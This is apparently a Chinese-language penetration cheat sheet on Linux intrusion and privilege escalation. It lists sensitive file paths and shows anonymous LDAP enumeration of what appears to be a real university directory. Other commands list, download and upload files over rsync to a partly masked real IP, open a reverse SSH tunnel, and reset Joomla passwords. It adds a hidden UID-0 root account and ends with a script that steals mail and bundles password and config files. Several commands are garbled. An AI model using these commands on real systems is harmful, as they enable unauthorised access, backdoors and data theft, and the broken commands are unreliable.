  • LINUX渗透与提权总结

    本文为 Linux 渗透与提权技巧总结篇,旨在收集各种 Linux 渗透与提权技巧,方便各位同学在日后的渗透测试中能够事半功倍。

    Linux 系统下的一些常见路径:

    001 /etc/passwd
    002  
    003 /etc/shadow
    004  
    005 /etc/fstab
    006  
    007 /etc/host.conf
    008  
    009 /etc/motd
    010  
    011 /etc/ld.so.conf
    012  
    013 /var/www/htdocs/index.php
    014  
    015 /var/www/conf/httpd.conf
    016  
    017 /var/www/htdocs/index.html
    018  
    019 /var/httpd/conf/php.ini
    020  
    021 /var/httpd/htdocs/index.php
    022  
    023 /var/httpd/conf/httpd.conf
    024  
    025 /var/httpd/htdocs/index.html
    026  
    027 /var/httpd/conf/php.ini
    028  
    029 /var/www/index.html
    030  
    031 /var/www/index.php
    032  
    033 /opt/www/conf/httpd.conf
    034  
    035 /opt/www/htdocs/index.php
    036  
    037 /opt/www/htdocs/index.html
    038  
    039 /usr/local/apache/htdocs/index.html
    040  
    041 /usr/local/apache/htdocs/index.php
    042  
    043 /usr/local/apache2/htdocs/index.html
    044  
    045 /usr/local/apache2/htdocs/index.php
    046  
    047 /usr/local/httpd2.2/htdocs/index.php
    048  
    049 /usr/local/httpd2.2/htdocs/index.html
    050  
    051 /tmp/apache/htdocs/index.html
    052  
    053 /tmp/apache/htdocs/index.php
    054  
    055 /etc/httpd/htdocs/index.php
    056  
    057 /etc/httpd/conf/httpd.conf
    058  
    059 /etc/httpd/htdocs/index.html
    060  
    061 /www/php/php.ini
    062  
    063 /www/php4/php.ini
    064  
    065 /www/php5/php.ini
    066  
    067 /www/conf/httpd.conf
    068  
    069 /www/htdocs/index.php
    070  
    071 /www/htdocs/index.html
    072  
    073 /usr/local/httpd/conf/httpd.conf
    074  
    075 /apache/apache/conf/httpd.conf
    076  
    077 /apache/apache2/conf/httpd.conf
    078  
    079 /etc/apache/apache.conf
    080  
    081 /etc/apache2/apache.conf
    082  
    083 /etc/apache/httpd.conf
    084  
    085 /etc/apache2/httpd.conf
    086  
    087 /etc/apache2/vhosts.d/00_default_vhost.conf
    088  
    089 /etc/apache2/sites-available/default
    090  
    091 /etc/phpmyadmin/config.inc.php
    092  
    093 /etc/mysql/my.cnf
    094  
    095 /etc/httpd/conf.d/php.conf
    096  
    097 /etc/httpd/conf.d/httpd.conf
    098  
    099 /etc/httpd/logs/error_log
    100  
    101 /etc/httpd/logs/error.log
    102  
    103 /etc/httpd/logs/access_log
    104  
    105 /etc/httpd/logs/access.log
    106  
    107 /home/apache/conf/httpd.conf
    108  
    109 /home/apache2/conf/httpd.conf
    110  
    111 /var/log/apache/error_log
    112  
    113 /var/log/apache/error.log
    114  
    115 /var/log/apache/access_log
    116  
    117 /var/log/apache/access.log
    118  
    119 /var/log/apache2/error_log
    120  
    121 /var/log/apache2/error.log
    122  
    123 /var/log/apache2/access_log
    124  
    125 /var/log/apache2/access.log
    126  
    127 /var/www/logs/error_log
    128  
    129 /var/www/logs/error.log
    130  
    131 /var/www/logs/access_log
    132  
    133 /var/www/logs/access.log
    134  
    135 /usr/local/apache/logs/error_log
    136  
    137 /usr/local/apache/logs/error.log
    138  
    139 /usr/local/apache/logs/access_log
    140  
    141 /usr/local/apache/logs/access.log
    142  
    143 /var/log/error_log
    144  
    145 /var/log/error.log
    146  
    147 /var/log/access_log
    148  
    149 /var/log/access.log
    150  
    151 /usr/local/apache/logs/access_logaccess_log.old
    152  
    153 /usr/local/apache/logs/error_logerror_log.old
    154  
    155 /etc/php.ini
    156  
    157 /bin/php.ini
    158  
    159 /etc/init.d/httpd
    160  
    161 /etc/init.d/mysql
    162  
    163 /etc/httpd/php.ini
    164  
    165 /usr/lib/php.ini
    166  
    167 /usr/lib/php/php.ini
    168  
    169 /usr/local/etc/php.ini
    170  
    171 /usr/local/lib/php.ini
    172  
    173 /usr/local/php/lib/php.ini
    174  
    175 /usr/local/php4/lib/php.ini
    176  
    177 /usr/local/php4/php.ini
    178  
    179 /usr/local/php4/lib/php.ini
    180  
    181 /usr/local/php5/lib/php.ini
    182  
    183 /usr/local/php5/etc/php.ini
    184  
    185 /usr/local/php5/php5.ini
    186  
    187 /usr/local/apache/conf/php.ini
    188  
    189 /usr/local/apache/conf/httpd.conf
    190  
    191 /usr/local/apache2/conf/httpd.conf
    192  
    193 /usr/local/apache2/conf/php.ini
    194  
    195 /etc/php4.4/fcgi/php.ini
    196  
    197 /etc/php4/apache/php.ini
    198  
    199 /etc/php4/apache2/php.ini
    200  
    201 /etc/php5/apache/php.ini
    202  
    203 /etc/php5/apache2/php.ini
    204  
    205 /etc/php/php.ini
    206  
    207 /etc/php/php4/php.ini
    208  
    209 /etc/php/apache/php.ini
    210  
    211 /etc/php/apache2/php.ini
    212  
    213 /web/conf/php.ini
    214  
    215 /usr/local/Zend/etc/php.ini
    216  
    217 /opt/xampp/etc/php.ini
    218  
    219 /var/local/www/conf/php.ini
    220  
    221 /var/local/www/conf/httpd.conf
    222  
    223 /etc/php/cgi/php.ini
    224  
    225 /etc/php4/cgi/php.ini
    226  
    227 /etc/php5/cgi/php.ini
    228  
    229 /php5/php.ini
    230  
    231 /php4/php.ini
    232  
    233 /php/php.ini
    234  
    235 /PHP/php.ini
    236  
    237 /apache/php/php.ini
    238  
    239 /xampp/apache/bin/php.ini
    240  
    241 /xampp/apache/conf/httpd.conf
    242  
    243 /NetServer/bin/stable/apache/php.ini
    244  
    245 /home2/bin/stable/apache/php.ini
    246  
    247 /home/bin/stable/apache/php.ini
    248  
    249 /var/log/mysql/mysql-bin.log
    250  
    251 /var/log/mysql.log
    252  
    253 /var/log/mysqlderror.log
    254  
    255 /var/log/mysql/mysql.log
    256  
    257 /var/log/mysql/mysql-slow.log
    258  
    259 /var/mysql.log
    260  
    261 /var/lib/mysql/my.cnf
    262  
    263 /usr/local/mysql/my.cnf
    264  
    265 /usr/local/mysql/bin/mysql
    266  
    267 /etc/mysql/my.cnf
    268  
    269 /etc/my.cnf
    270  
    271 /usr/local/cpanel/logs
    272  
    273 /usr/local/cpanel/logs/stats_log
    274  
    275 /usr/local/cpanel/logs/access_log
    276  
    277 /usr/local/cpanel/logs/error_log
    278  
    279 /usr/local/cpanel/logs/license_log
    280  
    281 /usr/local/cpanel/logs/login_log
    282  
    283 /usr/local/cpanel/logs/stats_log
    284  
    285 /usr/local/share/examples/php4/php.ini
    286  
    287 /usr/local/share/examples/php/php.ini
    288  
    289 /usr/local/tomcat5527/bin/version.sh
    290  
    291 /usr/share/tomcat6/bin/startup.sh
    292  
    293 /usr/tomcat6/bin/startup.sh

     Linux 相关提权渗透技巧总结,一、LDAP 渗透技巧:

    1 1.cat /etc/nsswitch

    查看密码登录策略,可以看到使用了 file ldap 模式

    1 2.less /etc/ldap.conf
    2  
    3 base ou=People,dc=unix-center,dc=net

    找到 ou、dc、dc 的设置

    3.查找管理员信息

    匿名方式

    1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    有密码形式

    1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    4.查找10条用户记录

    1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    实战:

    1 1.cat /etc/nsswitch

    查看密码登录策略,可以看到使用了 file ldap 模式

    1 2.less /etc/ldap.conf
    2  
    3 base ou=People,dc=unix-center,dc=net

    找到 ou、dc、dc 的设置

    3.查找管理员信息

    匿名方式

    1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    有密码形式

    1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    4.查找10条用户记录

    1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    渗透实战:

    1.返回所有的属性

    01 ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
    02  
    03 version: 1
    04  
    05 dn: dc=ruc,dc=edu,dc=cn
    06  
    07 dc: ruc
    08  
    09 objectClass: domain
    10  
    11 dn: uid=manager,dc=ruc,dc=edu,dc=cn
    12  
    13 uid: manager
    14  
    15 objectClass: inetOrgPerson
    16  
    17 objectClass: organizationalPerson
    18  
    19 objectClass: person
    20  
    21 objectClass: top
    22  
    23 sn: manager
    24  
    25 cn: manager
    26  
    27 dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
    28  
    29 uid: superadmin
    30  
    31 objectClass: inetOrgPerson
    32  
    33 objectClass: organizationalPerson
    34  
    35 objectClass: person
    36  
    37 objectClass: top
    38  
    39 sn: superadmin
    40  
    41 cn: superadmin
    42  
    43 dn: uid=admin,dc=ruc,dc=edu,dc=cn
    44  
    45 uid: admin
    46  
    47 objectClass: inetOrgPerson
    48  
    49 objectClass: organizationalPerson
    50  
    51 objectClass: person
    52  
    53 objectClass: top
    54  
    55 sn: admin
    56  
    57 cn: admin
    58  
    59 dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
    60  
    61 uid: dcp_anonymous
    62  
    63 objectClass: top
    64  
    65 objectClass: person
    66  
    67 objectClass: organizationalPerson
    68  
    69 objectClass: inetOrgPerson
    70  
    71 sn: dcp_anonymous
    72  
    73 cn: dcp_anonymous
    2.查看基础条目(-s base)
    1 bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

    3.以空 base 查找服务器自身信息

    001 bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
    002  
    003 version: 1
    004  
    005 dn:
    006  
    007 objectClass: top
    008  
    009 namingContexts: dc=ruc,dc=edu,dc=cn
    010  
    011 supportedExtension: 2.16.840.1.113730.3.5.7
    012  
    013 supportedExtension: 2.16.840.1.113730.3.5.8
    014  
    015 supportedExtension: 1.3.6.1.4.1.4203.1.11.1
    016  
    017 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
    018  
    019 supportedExtension: 2.16.840.1.113730.3.5.3
    020  
    021 supportedExtension: 2.16.840.1.113730.3.5.5
    022  
    023 supportedExtension: 2.16.840.1.113730.3.5.6
    024  
    025 supportedExtension: 2.16.840.1.113730.3.5.4
    026  
    027 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
    028  
    029 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
    030  
    031 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
    032  
    033 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
    034  
    035 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
    036  
    037 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
    038  
    039 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
    040  
    041 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
    042  
    043 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
    044  
    045 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
    046  
    047 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
    048  
    049 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
    050  
    051 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
    052  
    053 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
    054  
    055 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
    056  
    057 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
    058  
    059 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
    060  
    061 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
    062  
    063 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
    064  
    065 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
    066  
    067 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
    068  
    069 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
    070  
    071 supportedExtension: 1.3.6.1.4.1.1466.20037
    072  
    073 supportedExtension: 1.3.6.1.4.1.4203.1.11.3
    074  
    075 supportedControl: 2.16.840.1.113730.3.4.2
    076  
    077 supportedControl: 2.16.840.1.113730.3.4.3
    078  
    079 supportedControl: 2.16.840.1.113730.3.4.4
    080  
    081 supportedControl: 2.16.840.1.113730.3.4.5
    082  
    083 supportedControl: 1.2.840.113556.1.4.473
    084  
    085 supportedControl: 2.16.840.1.113730.3.4.9
    086  
    087 supportedControl: 2.16.840.1.113730.3.4.16
    088  
    089 supportedControl: 2.16.840.1.113730.3.4.15
    090  
    091 supportedControl: 2.16.840.1.113730.3.4.17
    092  
    093 supportedControl: 2.16.840.1.113730.3.4.19
    094  
    095 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
    096  
    097 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
    098  
    099 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
    100  
    101 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    102  
    103 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    104  
    105 supportedControl: 2.16.840.1.113730.3.4.14
    106  
    107 supportedControl: 1.3.6.1.4.1.1466.29539.12
    108  
    109 supportedControl: 2.16.840.1.113730.3.4.12
    110  
    111 supportedControl: 2.16.840.1.113730.3.4.18
    112  
    113 supportedControl: 2.16.840.1.113730.3.4.13
    114  
    115 supportedSASLMechanisms: EXTERNAL
    116  
    117 supportedSASLMechanisms: DIGEST-MD5
    118  
    119 supportedLDAPVersion: 2
    120  
    121 supportedLDAPVersion: 3
    122  
    123 vendorName: Sun Microsystems, Inc.
    124  
    125 vendorVersion: Sun-Java(tm)-System-Directory/6.2
    126  
    127 dataversion: 020090516011411
    128  
    129 netscapemdsuffix: cn=ldap://dc=webA:389
    130  
    131 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
    132  
    133 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
    134  
    135 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
    136  
    137 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
    138  
    139 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
    140  
    141 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
    142  
    143 supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
    144  
    145 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
    146  
    147 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
    148  
    149 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
    150  
    151 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
    152  
    153 supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
    154  
    155 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
    156  
    157 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
    158  
    159 supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
    160  
    161 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
    162  
    163 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
    164  
    165 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
    166  
    167 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
    168  
    169 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
    170  
    171 supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
    172  
    173 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
    174  
    175 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
    176  
    177 supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    178  
    179 supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
    180  
    181 supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
    182  
    183 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
    184  
    185 supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
    186  
    187 supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
    188  
    189 supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
    190  
    191 supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
    192  
    193 supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
    194  
    195 supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
    196  
    197 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
    198  
    199 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
    200  
    201 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
    202  
    203 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
    204  
    205 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
    206  
    207 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
    208  
    209 supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
    210  
    211 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
    212  
    213 supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
    214  
    215 supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
    216  
    217 supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
    218  
    219 supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
    220  
    221 supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
    222  
    223 supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
    224  
    225 supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
    226  
    227 supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
     

     Linux 相关提权渗透技巧总结,二、NFS 渗透技巧:

    列举指定 IP 上的 NFS 共享(导出目录):

    1 showmount -e ip

     Linux 相关提权渗透技巧总结,三、rsync 渗透技巧:

    1.查看 rsync 服务器上的模块列表:

    01 rsync 210.51.X.X::
    02  
    03 finance
    04  
    05 img_finance
    06  
    07 auto
    08  
    09 img_auto
    10  
    11 html_cms
    12  
    13 img_cms
    14  
    15 ent_cms
    16  
    17 ent_img
    18  
    19 ceshi
    20  
    21 res_img
    22  
    23 res_img_c2
    24  
    25 chip
    26  
    27 chip_c2
    28  
    29 ent_icms
    30  
    31 games
    32  
    33 gamesimg
    34  
    35 media
    36  
    37 mediaimg
    38  
    39 fashion
    40  
    41 res-fashion
    42  
    43 res-fo
    44  
    45 taobao-home
    46  
    47 res-taobao-home
    48  
    49 house
    50  
    51 res-house
    52  
    53 res-home
    54  
    55 res-edu
    56  
    57 res-ent
    58  
    59 res-labs
    60  
    61 res-news
    62  
    63 res-phtv
    64  
    65 res-media
    66  
    67 home
    68  
    69 edu
    70  
    71 news
    72  
    73 res-book

    查看相应的下级目录(注意一定要在目录名后面加上 /)

    1 rsync 210.51.X.X::htdocs_app/
    2  
    3 rsync 210.51.X.X::auto/
    4  
    5 rsync 210.51.X.X::edu/

    2.下载rsync服务器上的配置文件

    1 rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

    3.向上更新rsync文件(成功上传,不会覆盖)

    1 rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
    2  

     Linux 相关提权渗透技巧总结,四、squid 渗透技巧:

    1 nc -vv 91ri.org 80
    2  
    3 GET HTTP://www.sina.com / HTTP/1.0
    4  
    5 GET HTTP://WWW.sina.com:22 / HTTP/1.0

     Linux 相关提权渗透技巧总结,五、SSH 端口转发:

    1 ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

     Linux 相关提权渗透技巧总结,六、Joomla 渗透小技巧:

    确定版本:

    1 index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

    重新设置密码:

    1 index.php?option=com_user&view=reset&layout=confirm

     Linux 相关提权渗透技巧总结,七、Linux 添加 UID 为 0 的 root 用户:

    1 useradd -o -u 0 nothack

     Linux 相关提权渗透技巧总结,八、FreeBSD 本地提权:

    01 [argp@julius ~]$ uname -rsi
    02  
    03 * freebsd 7.3-RELEASE GENERIC
    04  
    05 * [argp@julius ~]$ sysctl vfs.usermount
    06  
    07 * vfs.usermount: 1
    08  
    09 * [argp@julius ~]$ id
    10  
    11 * uid=1001(argp) gid=1001(argp) groups=1001(argp)
    12  
    13 * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
    14  
    15 * [argp@julius ~]$ ./nfs_mount_ex
    16  
    17 *
    18  
    19 calling nmount()

     tar 文件夹打包:

    1、tar打包:

    1 tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*
    2  
    3 alzip打包(韩国) alzip -a D:WEB d:web*.rar

    {

    注:

    关于 tar 的打包方式:Linux 不以扩展名来决定文件类型。

    若压缩的话,用 tar -ztf *.tar.gz 查看压缩包里的内容,用 tar -zxf *.tar.gz 解压

    那么用下面这条命令比较好

    1 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

    }

    系统信息收集:

    01 for linux:
    02  
    03 #!/bin/bash
    04  
    05 echo #######geting sysinfo####
    06  
    07 echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
    08  
    09 echo #######basic infomation##
    10  
    11 cat /proc/meminfo
    12  
    13 echo
    14  
    15 cat /proc/cpuinfo
    16  
    17 echo
    18  
    19 rpm -qa 2>/dev/null
    20  
    21 ######stole the mail......######
    22  
    23 cp -a /var/mail /tmp/getmail 2>/dev/null
    24  
    25 echo 'u'r id is' `id`
    26  
    27 echo ###atq&crontab#####
    28  
    29 atq
    30  
    31 crontab -l
    32  
    33 echo #####about var#####
    34  
    35 set
    36  
    37 echo #####about network###
    38  
    39 ####this is then point in pentest,but i am a new bird,so u need to add some in it
    40  
    41 cat /etc/hosts
    42  
    43 hostname
    44  
    45 ipconfig -a
    46  
    47 arp -v
    48  
    49 echo ########user####
    50  
    51 cat /etc/passwd|grep -i sh
    52  
    53 echo ######service####
    54  
    55 chkconfig --list
    56  
    57 for i in {oracle,mysql,tomcat,samba,apache,ftp}
    58  
    59 cat /etc/passwd|grep -i $i
    60  
    61 done
    62  
    63 locate passwd >/tmp/password 2>/dev/null
    64  
    65 sleep 5
    66  
    67 locate password >>/tmp/password 2>/dev/null
    68  
    69 sleep 5
    70  
    71 locate conf >/tmp/sysconfig 2>dev/null
    72  
    73 sleep 5
    74  
    75 locate config >>/tmp/sysconfig 2>/dev/null
    76  
    77 sleep 5
    78  
    79 ###maybe can use "tree /"###
    80  
    81 echo ##packing up#########
    82  
    83 tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
    84  
    85 rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
     